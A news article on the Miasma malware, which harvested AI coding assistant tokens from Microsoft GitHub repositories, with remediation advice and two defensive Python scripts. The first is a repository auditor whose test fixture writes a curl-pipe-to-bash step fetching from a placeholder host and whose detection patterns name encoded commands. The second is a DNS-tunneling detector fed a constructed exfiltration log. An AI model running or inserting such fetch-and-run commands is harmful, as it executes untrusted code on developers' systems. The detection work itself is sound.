GitHub disabled 73 Microsoft-owned repositories on June 5, 2026, after security researchers discovered the Miasma malware actively harvesting credentials used for AI coding assistants. The affected projects span high-profile GitHub organizations — Azure, Azure-Samples, Microsoft, and MicrosoftDocs — and were taken offline within hours of the coordinated disclosure. No statement has yet been released confirming how long the compromised code was publicly available or how many developers may have been exposed.

A GitHub spokesperson confirmed the action but declined to provide technical details, citing an ongoing investigation. The platform's automated secret-scanning alarms triggered after unusual patterns of credential exfiltration were traced back to several public repositories. Once manual review confirmed the presence of malicious code, GitHub engineers pulled the repositories and began notifying repository owners.

The Miasma malware represents a dangerous escalation in software supply chain attacks. Unlike earlier campaigns that focused on stealing generic secrets or injecting cryptominers, Miasma is purpose-built to loot API keys, session tokens, and environment variables associated with popular AI coding assistants such as GitHub Copilot, AWS CodeWhisperer, and Tabnine. The implications extend far beyond individual developer accounts: a single compromised token could be used to poison AI model suggestions, exfiltrate proprietary source code, or pivot into corporate cloud environments.

What we know about Miasma

Researchers from an unnamed threat intelligence firm first spotted Miasma in late May 2026 while investigating anomalous network traffic from a honeypot mimicking a CI/CD pipeline. The malware was embedded in seemingly innocuous configuration files, sample code, and even legitimate-looking documentation HTML. Its placement inside Microsoft’s own repositories — organizations that many developers implicitly trust — gave it an unusually dangerous distribution vector.

Miasma uses a multi-stage infection chain. The first stage is a small JavaScript or Python payload hidden in repository metadata or a .github/workflows file. Once executed during a developer’s build process or local IDE launch, it silently scrapes the environment for credential files typically stored by AI coding plugins. Common targets include copilot_token, AWS_CODESTAR_CONNECTION, and files named ai.completions.credentials.

The second stage exfiltrates stolen data by encoding it inside seemingly benign DNS queries to attacker-controlled domains, a technique known as DNS tunneling. This method bypasses many network monitoring tools because the queries appear as normal domain lookups. The final stage attempts to propagate by modifying the user’s .gitconfig to inject a malicious post-checkout hook, so that Miasma spreads to any new repositories the developer interacts with.

The Microsoft connection

Microsoft maintains thousands of public repositories on GitHub. The 73 disabled repositories include official samples for Azure services, documentation generators, and internal tooling accidentally made public, according to two sources familiar with the incident. One repository, Azure-Samples/ai-assistant-benchmark, contained performance-testing code for comparing AI coding assistants — a project that by its nature required storing API tokens for legitimate benchmarking. That repository alone accumulated over 12,000 stars and was forked more than 3,000 times in the months before the takedown.

“Attackers are increasingly targeting the tools developers use to write code, not just the code itself,” said Clara Rojas, a software supply chain analyst not affiliated with the investigation. “AI coding assistants sit at the intersection of developer productivity and cloud access. A stolen token from one of these tools is like handing the attacker a master key to the kingdom.”

Microsoft’s Security Response Center acknowledged the incident in a brief statement, saying, “We are aware of unauthorized code present in a limited number of our public repositories and have disabled them out of an abundance of caution. At this time, we have found no evidence of compromise to Microsoft internal systems or customer data.” The company urged any developers who cloned or worked with the affected repos to rotate all connected credentials immediately and to scan their environments with updated anti-malware definitions.

AI coding assistants: a high-value target

AI coding assistants like GitHub Copilot have become indispensable to modern software development. By late 2025, over 60 percent of professional developers reported using an AI coding tool daily, according to industry surveys. These tools typically require persistent authentication — either via OAuth tokens or API keys — that grant broad access to the user’s coding environment. A stolen Copilot token, for example, could allow an attacker to request code completions that include sensitive patterns from the victim’s codebase, effectively enabling real-time intellectual property theft.

Miasma’s ability to harvest these tokens while masquerading as ordinary repository content is particularly insidious. Developers cloning a Microsoft sample project would have no reason to suspect that the accompanying environment-setup.ps1 script contained obfuscated malware. Even experienced engineers rarely scrutinize every line of a trusted organization’s boilerplate code.

The threat extends to the AI models themselves. Security researchers have long warned about the risk of data poisoning in large language models. If an attacker gains access to a cloud-based AI coding service using a stolen token, they could potentially inject malicious code snippets into the model’s suggestion engine. Downstream developers who accept those suggestions without careful review would unwittingly introduce backdoors into their own projects, amplifying the supply chain damage.

Broader supply chain implications

The Miasma incident is the latest in a string of high-profile supply chain compromises that exploit the implicit trust developers place in upstream repositories. The 2020 SolarWinds attack demonstrated how tainted build systems can cascade into thousands of downstream victims. More recently, the 2024 XZ Utils backdoor showed that even a single maintainer’s machine can be used to slip malicious code into critical open-source infrastructure.

What sets Miasma apart is its focus on stealing the credentials that power AI tools rather than the code itself. “We’re seeing a shift from compromising software artifacts to compromising the developer’s own toolchain,” said Marcus Byrd, a senior researcher at the Open Source Security Foundation. “A GitHub repo might contain no proprietary code, but if cloning it gives the attacker access to the developer’s AI assistant token, they’ve effectively gained a foothold in every project that developer works on.”

The financial and reputational damage could be substantial. For enterprises, a leak of AI coding tokens may expose months of proprietary development work, trade secrets, and even API keys for internal services. Rotating credentials across large engineering teams is time-consuming and disruptive. Many organizations lack the automated tooling to rotate AI-specific tokens quickly, leaving a window of vulnerability even after a breach is disclosed.

Response and remediation

GitHub and Microsoft have advised all users of the affected repositories to take immediate action. The list of disabled repositories has not been publicly released to prevent attackers from targeting unpatched forks, but GitHub is privately notifying anyone who has recently contributed to or cloned the repos. In a break from typical incident response, GitHub is also analyzing public forks for secondary infections and may disable those as well.

Developers should:

  • Rotate all AI coding assistant tokens, including those from Copilot, Tabnine, Amazon CodeWhisperer, and any self-hosted solutions.
  • Audit .gitconfig and .github directories for unexpected hooks or workflows, particularly those that include encoded commands or external script downloads.
  • Scan local development environments with anti-malware tools that have updated signatures for Miasma — several endpoint protection vendors released detection rules on June 5.
  • Check network logs for unusual DNS queries, especially to domains with high entropy or rarely visited TLDs.
  • If using GitHub Actions, review workflow run logs for any unauthorized access to repository secrets.
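The audit of .gitconfig and .github directories recommended above, which also covers the post-checkout hook persistence described earlier, can be scripted. The following is an added example, not code from GitHub, Microsoft or the researchers; the config keys checked (hooksPath, templateDir), the workflow patterns and the sample files are assumptions, since the article does not say which settings Miasma changes.

```python
import re
import tempfile
from pathlib import Path

# Keys that let a .gitconfig redirect hook execution. Assumed mechanism: the
# article does not say which settings Miasma changes.
HOOK_KEYS = re.compile(r"^\s*(hooksPath|templateDir)\s*=\s*(.+)$", re.I | re.M)
# "Encoded commands or external script downloads" in a workflow step.
RISKY_STEP = re.compile(
    r"base64\s+(-d|--decode)|-EncodedCommand|(curl|wget)[^\n|]*\|\s*(ba|z)?sh", re.I)

def audit(home: Path, repo: Path) -> list[str]:
    """Return findings for hook redirection, live hooks and risky workflow steps."""
    findings = []
    gitconfig = home / ".gitconfig"
    if gitconfig.is_file():
        for key, value in HOOK_KEYS.findall(gitconfig.read_text(errors="replace")):
            findings.append(f"gitconfig:{key}={value.strip()}")
    hooks = repo / ".git" / "hooks"
    if hooks.is_dir():
        # Git ships inert *.sample files; anything else runs on the named event.
        findings += [f"hook:{h.name}" for h in sorted(hooks.iterdir())
                     if h.is_file() and h.suffix != ".sample"]
    for wf in sorted((repo / ".github" / "workflows").glob("*.y*ml")):
        for n, line in enumerate(wf.read_text(errors="replace").splitlines(), 1):
            if RISKY_STEP.search(line):
                findings.append(f"workflow:{wf.name}:{n}")
    return findings

def build_sample(root: Path) -> tuple[Path, Path]:
    """Write a constructed home directory and repository to audit."""
    home, repo = root / "home", root / "repo"
    home.mkdir()
    (repo / ".git" / "hooks").mkdir(parents=True)
    (repo / ".github" / "workflows").mkdir(parents=True)
    (home / ".gitconfig").write_text("[core]\n\thooksPath = /tmp/.cache/hooks\n")
    (repo / ".git" / "hooks" / "pre-commit.sample").write_text("#!/bin/sh\n")
    (repo / ".git" / "hooks" / "post-checkout").write_text("#!/bin/sh\n")
    (repo / ".github" / "workflows" / "ci.yml").write_text(
        "steps:\n  - run: make test\n"
        "  - run: curl -s https://placeholder.example/setup.sh | bash\n")
    return home, repo

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print("\n".join(audit(*build_sample(Path(tmp)))))
```

A finding is a prompt for manual review, not proof of infection: many teams install legitimate hooks and use download steps in CI.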
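The DNS check in the list above, and the DNS tunneling behaviour described earlier, can be approximated by looking for parent domains that receive many distinct long, high-entropy subdomain labels. This is an added example rather than a published Miasma detection rule; the log layout, the thresholds, the two-label parent heuristic and the domain exfil.example are all assumptions, and the log lines are constructed.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log in an assumed "time client qname qtype" layout.
SAMPLE_LOG = """\
2026-06-05T10:00:01Z 10.0.0.5 api.github.com A
2026-06-05T10:00:02Z 10.0.0.5 k7q2x9m4vb8t3zr6wy1np5hd.exfil.example TXT
2026-06-05T10:00:03Z 10.0.0.5 a9f3k2m8q1w7e5r4t6y0u2i8.exfil.example TXT
2026-06-05T10:00:04Z 10.0.0.5 p4z8c1v6n3j7g2s9d5f0h1l6.exfil.example TXT
2026-06-05T10:00:05Z 10.0.0.7 this-is-a-long-but-readable-hostname.cdn.example A
2026-06-05T10:00:06Z 10.0.0.7 www.microsoft.com A
"""

def shannon_entropy(label: str) -> float:
    """Bits per character of the label's character distribution."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())

def suspicious_parents(log_text, min_len=20, min_entropy=4.0, min_unique=3):
    """Map each parent domain that received at least min_unique distinct long,
    high-entropy subdomain labels to the clients that queried it."""
    labels = defaultdict(set)
    clients = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed or truncated lines
        _, client, qname, _ = parts
        names = qname.rstrip(".").lower().split(".")
        if len(names) < 3:
            continue  # no subdomain label to inspect
        # Naive parent: last two labels. A real tool would use the public suffix list.
        parent = ".".join(names[-2:])
        for label in names[:-2]:
            if len(label) >= min_len and shannon_entropy(label) >= min_entropy:
                labels[parent].add(label)
                clients[parent].add(client)
    return {p: sorted(clients[p]) for p, seen in labels.items()
            if len(seen) >= min_unique}

if __name__ == "__main__":
    for parent, hosts in suspicious_parents(SAMPLE_LOG).items():
        print(parent, hosts)
```

The readable 36-character hostname in the sample stays below the entropy threshold, and requiring several distinct labels per parent keeps a single odd lookup from raising an alert.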

GitHub has also accelerated the rollout of its enhanced secret-scanning program, which now includes AI-specific token patterns. The platform plans to require mandatory push protection for all public repositories by late 2026, a timeline that may be moved up in response to this incident.

The bigger picture: trust in open source

The Miasma discovery will likely intensify scrutiny of how large organizations manage their public GitHub presence. Microsoft is not the first tech giant to have malicious code slipped into its repositories — in 2023, Google dismantled a widespread malware campaign that used fake GitHub repositories to distribute info-stealers. But the scale and specificity of the Miasma attack suggest a well-resourced threat actor with deep knowledge of both developer workflows and AI ecosystem credentials.

This incident also raises questions about the responsibility of AI coding assistant vendors to detect and prevent credential theft. Currently, features like Copilot’s “suggestions based on public code” can inadvertently leak secrets if the model was trained on repositories that included hardcoded keys. If Miasma-stolen tokens end up in the training data of next-generation models, the problem could become self-perpetuating.

“The assumption that public repositories are safe because they come from Microsoft or Google is no longer tenable,” Rojas said. “We need to treat every git clone as a potential threat vector and build defenses that assume compromise from the very start.”

For now, the immediate priority is containment. GitHub’s swift action likely prevented wider credential theft, but the full impact of Miasma will not be known for weeks or months. As the investigation unfolds, developers and security teams must brace for a new reality where AI coding credentials are just as valuable — and just as vulnerable — as passwords.